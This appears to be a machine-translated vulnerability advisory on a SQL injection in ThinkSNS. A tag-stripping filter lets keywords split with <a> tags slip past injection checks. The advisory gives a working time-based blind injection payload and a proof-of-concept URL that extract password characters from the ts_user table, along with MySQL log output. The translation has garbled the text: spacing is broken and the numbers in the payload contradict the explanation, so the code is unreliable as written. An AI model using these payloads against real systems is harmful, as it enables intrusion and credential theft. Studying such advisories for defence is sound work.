A SQL injection vulnerability in ThinkSNS (bypass anti-injection)

A SQL injection vulnerability in ThinkSNS (bypass anti-injection)

A SQL injection vulnerability exists in ThinkSNS and attackers can bypass anti-injection to obtain arbitrary data.

Vulnerability code: \ apps \ public \ Lib \ Action \ TestAction. class. php

540 source code at the line:

public function updateCategorySort(){$stable = t($_GET['t']);!empty($stable) && model('CategoryTree')->setTable($stable)->updateSort();}

In the code, the $ stable function represents the table name, and $ stable is passed in directly using the GET method: $ stable = t ($ _ GET ['T']); obviously, if the t function is improperly processed, it will inevitably cause the SQL injection vulnerability.

1) Let's take a look at the processing logic of the t function: (\ core \ OpenSociax \ functions. inc. php 630)
 

/*** T function is used to filter tags and output clean text without html * @ param string text content * @ return string processed content */function t ($ text) {$ text = nl2br ($ text); $ text = real_strip_tags ($ text); $ text = addslashes ($ text); $ text = trim ($ text ); return $ text ;}

In the t function implementation, the real_strip_tags function will be called before the addslashes processing.

2) Let's take a look at the implementation of the real_strip_tags function: (\ core \ OpenSociax \ functions. inc. php 2274 rows)
 

function real_strip_tags($str, $allowable_tags="") {$str = html_entity_decode($str,ENT_QUOTES,'UTF-8');return strip_tags($str, $allowable_tags);}

The real_strip_tags function filters out html tags. Therefore, the implementation of the t function has the defect of bypassing anti-injection. For example, during the injection, the s <a> elect function can be passed into the t function, after the real_strip_tags function, s <a> elect is converted to select, bypassing the keyword regular match detection of SQL injection.

Therefore, the following Payload can be constructed for blind note:

/Index. php? App = public & mod = Test & act = updateCategorySort & t = user/**/W <a> HERE/**/IF (S <a> ELECT /**/ A <a> SCII (S <a> UBSTRING (PASSWORD, (101) F <a> ROM/**/ts_user/**/L <a> IMIT/**/1) = 2.02, S <a> LEEP ), 0) % 23

If ASCII (SUBSTRING (PASSWORD, 103) = 2.02 is the character e, sleep () is executed. After each execution, the sleep time needs to be changed. Otherwise, there will be a cache, as a result, there is no sleep effect. Here, you can use sleep (2.03) or sleep (2.04) to bypass caching by increasing decimal places.

Proof of exploits: (local test)

Http: // FIG/thinksns-V3.1/index. php? App = public & mod = Test & act = updateCategorySort & t = user/**/W <a> HERE/**/IF (S <a> ELECT /**/ A <a> SCII (S <a> UBSTRING (PASSWORD, (2.02) F <a> ROM/**/ts_user/**/L <a> IMIT 1) = 101,1 = S <a> LEEP (), 0) % 23

Mysql Log output is as follows:

15 QuerySHOW columns from ts_user/**/where/**/if (select/**/ascii (substring (password, 1, 1 )) from/**/ts_user/**/limit 1) = 101, sleep (2.02), 0 )#

The system successfully bypasses anti-injection for Time Delay blind injection ..

Solution:

Strengthen filtering Logic